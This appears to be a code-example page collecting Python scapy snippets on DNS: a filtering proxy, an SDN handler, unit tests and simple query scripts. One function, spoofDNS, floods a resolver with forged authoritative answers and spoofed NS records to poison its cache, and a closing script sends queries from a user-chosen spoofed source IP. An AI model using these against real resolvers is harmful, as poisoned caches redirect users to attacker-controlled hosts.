                logf.write(query_type)
                logf.write(' DENY\n')
            nxd = DNS(id=qid, rcode=3, qd=DNSQR(qtype=qtype, qname=orig_qname))
            resp_pkt = nxd
            csocket.sendto(bytes(resp_pkt), address)
            return

    # Send UDP query to upstream DNS resolver
    udp_response = sendUDP(dns_ip, data)
    # Log if necessary
    if logging:
        logf.write(qname.decode())
        logf.write(' ')
        logf.write(query_type)
        logf.write(' ALLOWED\n')
    # send back to client
    csocket.sendto(udp_response, address)
Esempio n. 28
0
 def test_a_lookup(self):
     question = IP(dst=self.resolverAddr) / \
                UDP() / \
                DNS(rd=1, qd=DNSQR(qtype="A", qclass="IN", qname=self.hostname))
     log.msg("Performing query to %s with %s:%s" %
             (self.hostname, self.resolverAddr, self.resolverPort))
     yield self.sr1(question)
Esempio n. 29
0
 def handle_packet(self):
     pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0]
     pkt_udp = self._pkt.get_protocols(udp.udp)[0]
     cs = self._controller.get_customers()
     index1 = self._controller.get_current_customer_id()
     dns = DNS(self._pkt[-1])
     print('------UDP---------', index1, cs[int(index1)].get_next_hop_mac(),
           self._controller.get_transaction_id())
     if self._controller.get_destination_nat(
     ) is not None and self._controller.get_transaction_id() is not None:
         new_pkt = packet.Packet()
         new_pkt.add_protocol(
             ethernet.ethernet(src='10:00:00:00:10:ff',
                               dst=cs[int(index1)].get_next_hop_mac()))
         new_pkt.add_protocol(
             ipv4.ipv4(src=pkt_ip.src,
                       dst=cs[int(index1)].get_name_server(),
                       proto=17))
         new_pkt.add_protocol(
             udp.udp(src_port=pkt_udp.src_port, dst_port=pkt_udp.dst_port))
         new_pkt.add_protocol(self._pkt[-1])
         print('---------okt--------', new_pkt)
         new_pkt.serialize()
         print(
             '----------------The Number of Exchanged PACKETS between Controllers-----',
             self._controller.get_packet_counter())
         self.send_dns_packet(new_pkt, cs[int(index1)].get_datapath(),
                              cs[int(index1)].get_ingress_port())
     elif self._controller.get_destination_nat() is None:
         self.send_dns_response_to_controller(self._pkt)
def spoofDNS():
    dns_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # print("Sub Domain", SUB_DOMAIN)
    Qdsec = DNSQR(qname=SUB_DOMAIN)
    Anssec = DNSRR(rrname=SUB_DOMAIN, type='A', rdata=SPROOF_ADDR, ttl=68900)
    dns = DNS(id=getRandomTXID(),
              aa=1,
              rd=0,
              qr=1,
              qdcount=1,
              ancount=1,
              nscount=2,
              arcount=0,
              qd=Qdsec,
              an=Anssec,
              ns=DNSRR(rrname=b'example.com', rdata=SPROOF_NS_1, type='NS') /
              DNSRR(rrname=b"example.com", type='NS', rdata=SPROOF_NS_2))
    response = dns

    response.getlayer(DNS).qd.qname = SUB_DOMAIN
    for _ in range(125):
        # Set random TXID from 0 to 255
        response.getlayer(DNS).id = getRandomTXID()
        sendPacket(dns_sock, response, DNS_ADDR, my_query_port)
    dns_sock.close()
Esempio n. 31
0
def test_from_datasources():
    packets_1 = [
        Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
        IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) /
        HTTP() /
        HTTPRequest(Method="GET", Path="/foo", Host="https://google.com")
    ]

    packets_2 = [
        # HTTP Packet
        Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
        IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) /
        HTTP() /
        HTTPRequest(Method="GET", Path="/foo", Host="https://google.com"),
        # DNS Packet
        Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
        IP(src="127.0.0.1", dst="192.168.1.1") / UDP(sport=80, dport=53) /
        DNS(rd=1,
            qd=DNSQR(qtype="A", qname="google.com"),
            an=DNSRR(rdata="123.0.0.1")),
        # TCP Packet
        Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
        IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=80, dport=5355),
    ]

    nx = NetworkX.from_datasources([
        packets_to_datasource_events(packets)
        for packets in [packets_1, packets_2]
    ])

    # Make the graph
    nx.graph()

    assert not nx.is_empty()
Esempio n. 32
0
def test_read_layers():
    """
    Tests the ability to read each layer
    """
    packet = IP() / UDP() / TCP() / DNS() / DNSQR(qname="example.com") / DNSQR(
        qname="example2.com") / DNSQR(qname="example3.com")
    packet_geneva = layers.packet.Packet(packet)
    packet_geneva.setup_layers()

    i = 0
    for layer in packet_geneva.read_layers():
        if i == 0:
            assert isinstance(layer, layers.ip_layer.IPLayer)
        elif i == 1:
            assert isinstance(layer, layers.udp_layer.UDPLayer)
        elif i == 2:
            assert isinstance(layer, layers.tcp_layer.TCPLayer)
        elif i == 3:
            assert isinstance(layer, layers.dns_layer.DNSLayer)
        elif i == 4:
            assert isinstance(layer, layers.dnsqr_layer.DNSQRLayer)
            assert layer.layer.qname == b"example.com"
        elif i == 5:
            assert isinstance(layer, layers.dnsqr_layer.DNSQRLayer)
            assert layer.layer.qname == b"example2.com"
        elif i == 6:
            assert isinstance(layer, layers.dnsqr_layer.DNSQRLayer)
            assert layer.layer.qname == b"example3.com"
        i += 1
Esempio n. 33
0
    def test_packet_handler(self, mocker):
        """
        Test the packet handler for a single DNS lookup. The lookup should be
        added to the list of lookups, and a packet dumpling representing the
        lookup should be returned.
        """
        test_lookup_host = 'www.apple.com'
        packet = UDP() / DNS(rd=1, qd=DNSQR(qname=test_lookup_host))

        mock_time = mocker.patch('time.time', return_value=1234567890)

        chef = DNSLookupChef()
        dumpling = chef.packet_handler(packet)

        # Check that the hostname is added to our list of lookups.
        assert len(chef.lookups_seen) == 1
        assert chef.lookups_seen[test_lookup_host] == {
            'count': 1,
            'latest': mock_time.return_value,
        }

        # Check that the packet dumpling for this lookup was sent out, with the
        # correct payload.
        assert dumpling == {
            'lookup': {
                'hostname': test_lookup_host,
                'when': mock_time.return_value,
            }
        }
Esempio n. 34
0
 def run(self):
     while True:
         self.enter_loop.wait()
         self.enter_loop.clear()
         if self.stopped:
             return
         p, remote = self.socket.recvfrom(1500)
         p = DNS(Raw(p))
         # check received packet for correctness
         assert (p is not None)
         assert (p[DNS].qr == 0)
         assert (p[DNS].opcode == 0)
         # has two queries
         assert (p[DNS].qdcount == TEST_QDCOUNT)
         qdcount = p[DNS].qdcount
         # both for TEST_NAME
         assert (p[DNS].qd[0].qname == TEST_NAME.encode("utf-8") + b".")
         assert (p[DNS].qd[1].qname == TEST_NAME.encode("utf-8") + b".")
         assert (any(p[DNS].qd[i].qtype == DNS_RR_TYPE_A
                     for i in range(qdcount)))  # one is A
         assert (any(p[DNS].qd[i].qtype == DNS_RR_TYPE_AAAA
                     for i in range(qdcount)))  # one is AAAA
         if self.reply is not None:
             self.socket.sendto(Raw(self.reply), remote)
             self.reply = None
Esempio n. 35
0
    def test_stripping_trailing_period(self, mocker):
        """
        Test that we strip the trailing period off of any host lookups.
        """
        test_host_with_period = 'www.apple.com.'
        test_host_without_period = 'www.apple.com'
        packet = UDP() / DNS(rd=1, qd=DNSQR(qname=test_host_with_period))

        mock_time = mocker.patch('time.time', return_value=1234567890)

        chef = DNSLookupChef()
        dumpling = chef.packet_handler(packet)

        # Check that the hostname is added to our list of lookups.
        assert len(chef.lookups_seen) == 1
        assert chef.lookups_seen[test_host_without_period] == {
            'count': 1,
            'latest': mock_time.return_value,
        }

        # Check that the packet dumpling for this lookup was sent out, with the
        # correct payload.
        assert dumpling == {
            'lookup': {
                'hostname': test_host_without_period,
                'when': mock_time.return_value,
            }
        }
Esempio n. 36
0
'''
Sample script to send a DNS query 
'''
import scapy
from scapy.sendrecv import sendp, sniff, sr1
from scapy.all import  IP, UDP, DNS, DNSQR

google_DNS_service = '8.8.8.8'
name_to_find = "fmi.unibuc.ro"

network_layer = IP(dst = google_DNS_service)
transport_layer = UDP(dport = 53)
dns = DNS(rd = 1)
dns_query = DNSQR(qname = name_to_find)
dns.qd = dns_query

pachet = network_layer / transport_layer / dns

# send and recieve one packet 
answer = sr1(pachet)
print answer[DNS].summary()
Esempio n. 37
0
#/usr/bin/python

from scapy.all import IP, UDP, DNS, DNSQR, send

# Get all input about DNS package.
destination_input = str(raw_input('What is your DNS server which you want to resolve from? :: '))
source_input = str(raw_input('What is your source ip address which you want to send DNS request from? :: '))
query_input = str(raw_input('What is the address which will be queried by DNS server? :: '))

# Create ip, udp and dns packages.
i = IP(dst=destination_input)
i.src = source_input
u = UDP(dport=53)
d = DNS(rd=1,qd=DNSQR(qname=query_input))

# Print all information.
print ""
print "Information"
print "==========="
print "Source IP     : %s" %source_input
print "Destination IP: %s" %destination_input
print "DNS Query     : %s" %query_input
print ""
print "Package details"
print "==============="
print ""
print i.show()
print ""
print u.show()
print ""
print d.show()